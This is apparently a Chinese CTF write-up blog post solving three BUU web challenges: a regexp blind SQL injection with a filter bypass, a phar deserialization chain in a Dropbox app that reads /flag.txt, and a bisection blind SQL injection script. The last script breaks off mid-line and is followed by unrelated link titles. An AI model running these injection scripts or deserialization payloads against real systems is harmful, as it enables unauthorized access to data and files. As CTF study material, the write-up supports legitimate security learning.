BUU刷题-web

Posted Rgylin

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU刷题-web相关的知识,希望对你有一定的参考价值。

[NCTF2019]SQLi

访问robots.txt

发现hint

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\\'|=| |in|<|>|-|\\.|\\(\\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

发现过滤了 太多东西 单引号都给过滤了 ,

不过这里可以用\\来闭合’看了看php版本[外链图片

可以用%00截断,那末思路就有了

先尝试一波正确回显

看到回显welcome,那末可以利用这个来判断 bool类型

regexp 字符串匹配支持正则

脚本为主要语句为

 data = {
            'username': '\\\\',
            'passwd': "||/**/passwd/**/regexp/**/\\"^{}\\";{}".format((password+j),parse.unquote('%00'))
        }

脚本为

import  requests
import  string
from urllib import parse
string= string.ascii_lowercase + string.digits + '_'
url= 'http://0c034adc-a4d9-4fe6-98f2-5ca68f2effe9.node4.buuoj.cn:81/index.php'
password=''

for i in range(50):
    for j in string:
        data = {
            'username': '\\\\',
            'passwd': "||/**/passwd/**/regexp/**/\\"^{}\\";{}".format((password+j),parse.unquote('%00'))
        }
        res= requests.post(url=url,data=data)
        if('welcome' in res.text):
            password+=j
            print(password)
            break



然后 提交密码 得到flag

看了看大佬wp 发现如果这里""被过滤的情况下可以用 16进制来绕过

[CISCN2019 华北赛区 Day1 Web1]Dropbox

首先随便注册一个号进去

上传一个文件后 发现有下载功能 ->任意文件下载

bp抓一下包

发现有戏

尝试一下 index.php显示文件不存在 那末路径换一下试试 最终…/…/index.php 文件存在

index.php

<?php
include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>

class.php

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">åˆ é™¤</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

delete.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

找到

    public function close() {
        return file_get_contents($this->filename);
    }

可以控制 那末尝试构造调用此方法

$a= new User();
$a->db= new File();
$a->db->filename= '/flag.txt'

可是这样构造没有回显 ,那采取间接方法.

那么我们就让$this->db = new FileList(),让它去调用close,然后调用__call(),然后调用

__call()方法在调用 _destruct函数,打印结果

构造如下

<?php


class User {
    public $db;
}

class FileList
{
    private $files;
    private $results;
    private $funcs;
    public function __construct()
    {
        $this->files = array(new File());
        $this->results = array();
        $this->funcs = array();
    }

}

class File
{
    public $filename = '/flag.txt';
}
$a= new User();
$a->db= new FileList();
$phar = new Phar("myphar.phar"); //后缀名必须为phar

$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

[CISCN2019 总决赛 Day2 Web1]Easyweb

老套路 查看源代码 ,和访问robots.txt

源代码 发现类似注入点的地方

User-agent: *
Disallow: *.php.bak

看师傅的wp 是访问

image.php.bak

得到源码

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\\\0","%00","\\\\'","'"),"",$id);
$path=str_replace(array("\\\\0","%00","\\\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

那就尝试一下注入

输入\\0 时会被addslashes()函数转成 \\ \\0 进而将\\0过滤留下 \\从而可以转移’ 达到绕过目的

可以利用

# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)

得出回显的内容有JFIF

尝试爆出数据库

import requests

#username=123&password=Password


url ='http://d80bf902-c46b-46a9-82d1-c6da6e8bfb01.node4.buuoj.cn:81/image.php?id=\\\\0&path='

#JFIF
# payload= 'or ord(substr(database(),{0},1))>1%23'.format(1)
# print(url+payload)
# print(requests.get(url+payload).text)
#
#
result = ''
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'or ascii(substr(database()/**/from/**/{i}buu刷题

buu刷题笔记

BUU-WEB-[ZJCTF 2019]NiZhuanSiWei

BUU-WEB-[NPUCTF2020]ReadlezPHP

BUU-WEB-[De1CTF 2019]SSRF Me

BUU-WEB-[BJDCTF2020]ZJCTF,不过如此